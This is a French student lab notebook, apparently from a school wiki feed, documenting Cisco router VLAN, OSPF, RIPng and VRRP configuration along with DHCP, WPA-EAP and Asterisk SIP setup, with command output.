encryption vlan 6 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_FLASH&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 6&lt;br /&gt;
bridge-group 6 subscriber-loop-control&lt;br /&gt;
bridge-group 6 spanning-disabled&lt;br /&gt;
bridge-group 6 block-unknown-source&lt;br /&gt;
no bridge-group 6 source-learning&lt;br /&gt;
no bridge-group 6 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
bridge-group 6&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons maintenant configurer l'interface wlan0 de notre eeePc pour pouvoir se connecter à la borne. Comme nous n'avons pas encore de serveur DHCP, nous devons la configurer manuellement, en prenant une adresse dans notre VLAN :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.6.6&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.6.1&lt;br /&gt;
  wpa-ssid SSID_FLASH&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity flash&lt;br /&gt;
  wpa-password reverse&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons lancer notre serveur FreeRadius en mode debug via '''freeradius -X'''. &amp;lt;br /&amp;gt;&lt;br /&gt;
On arrive bien à détecter notre SSID (SSID_FLASH) via un smartphone, et nous arrivons à ping notre eeePc depuis la machine virtuelle .&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# ping 10.60.6.6&lt;br /&gt;
PING 10.60.6.6 (10.60.6.6) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=1 ttl=63 time=8.03 ms&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=2 ttl=63 time=13.2 ms&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=3 ttl=63 time=3.42 ms&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 9e séance====&lt;br /&gt;
=====Serveur DHCP=====&lt;br /&gt;
Nous avons installé le paquet '''isc-dhcp-server'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous avons modifié le fichier de configuration du serveur DHCP''' /etc/dhcp/dhcpd.conf''':&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;option domain-name &amp;quot;speedflash.space&amp;quot;;&lt;br /&gt;
option domain-name-servers 193.48.57.165;&lt;br /&gt;
&lt;br /&gt;
subnet 10.60.6.0 netmask 255.255.255.0 {&lt;br /&gt;
      range 10.60.6.10 10.60.6.40;&lt;br /&gt;
      option routers 10.60.6.1;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite modifié le fichier '''/etc/default/isc-dhcp-server''' pour y ajouter wlan0 comme interface à prendre en compte.&lt;br /&gt;
Nous avons redémarré le serveur en lançant '''service isc-dhcp-server restart'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
En se connectant avec un smartphone en DHCP, nous arrivons à avoir une adresse IP : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:DHCP iphone.png || center || 350px]] &amp;lt;br /&amp;gt;&lt;br /&gt;
et nous arrivons à la pinger depuis la machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# ping 10.60.6.10&lt;br /&gt;
PING 10.60.6.10 (10.60.6.10) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.6.10: icmp_seq=1 ttl=63 time=81.8 ms&lt;br /&gt;
64 bytes from 10.60.6.10: icmp_seq=2 ttl=63 time=132 ms&lt;br /&gt;
64 bytes from 10.60.6.10: icmp_seq=3 ttl=63 time=69.4 ms&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====PCBX=====&lt;br /&gt;
Nous avons modifiés le fichier sip.conf :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;[general]&lt;br /&gt;
hasvoicemail=yes&lt;br /&gt;
hassip=yes&lt;br /&gt;
hasiax=yes&lt;br /&gt;
callwaiting=yes&lt;br /&gt;
threewaycalling=yes&lt;br /&gt;
callwaitingcallerid=yes&lt;br /&gt;
transfer=yes&lt;br /&gt;
canpark=yes&lt;br /&gt;
cancallforward=yes&lt;br /&gt;
callreturn=yes&lt;br /&gt;
callgroup=1&lt;br /&gt;
pickupgroup=1&lt;br /&gt;
nat=yes&lt;br /&gt;
&lt;br /&gt;
[6001]&lt;br /&gt;
type=friend&lt;br /&gt;
host=dynamic&lt;br /&gt;
dtmfmode=rfc2833&lt;br /&gt;
disallow=all&lt;br /&gt;
allow=ulaw&lt;br /&gt;
fullname=ThomasStephane&lt;br /&gt;
username=trojSmaia&lt;br /&gt;
secret=secret&lt;br /&gt;
context=work&lt;br /&gt;
&lt;br /&gt;
[6002]&lt;br /&gt;
type=friend&lt;br /&gt;
host=dynamic&lt;br /&gt;
dtmfmode=rfc2833&lt;br /&gt;
disallow=all&lt;br /&gt;
allow=ulaw&lt;br /&gt;
fullname=ThomasStephane&lt;br /&gt;
username=smaiaTroj&lt;br /&gt;
secret=secret2&lt;br /&gt;
context=work&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis, nous avons modifiés le fichier /etc/asterisk/extensions.conf pour ajouter le contexte work à notre PCBX:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;[work]&lt;br /&gt;
exten=&amp;gt;_6XXX,1,Dial(SIP/${EXTEN},20)&lt;br /&gt;
exten =&amp;gt; _6XXX,2,Hangup()&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous n'avons pas encore testé cette solution.&lt;br /&gt;
====Travail réalisé lors de la 10e séance====&lt;br /&gt;
=====Configuration PCBX=====&lt;br /&gt;
Nous avons pu tester notre configuration PCBX.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous avons installé CSipSimple sur 2 téléphones Android, et nous avons configurés les 2 comptes.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Enregistrement_SIP.jpg|center|300px]]&lt;br /&gt;
Puis, nous avons essayés de s'appeler, la connexion s'effectue et nous pouvons discuter.&amp;lt;br /&amp;gt;&lt;br /&gt;
Et voici les logs d'Asterisk :&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Logs_SIP.jpg|center|550px]]&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35997</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35997"/>
				<updated>2016-12-13T14:06:11Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Serveur DHCP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | RAID5 - Cryptage de données&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (additionnel - 7-8/12/2016)&lt;br /&gt;
 | Modification configuration routeur pour prise en charge Wifi - Sécurisation Wifi par WPA-EAP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 9 (12/12)&lt;br /&gt;
 | Configuration DHCP - PCBX&lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère séance ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e et 3e séance (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e séance====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5e séance====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
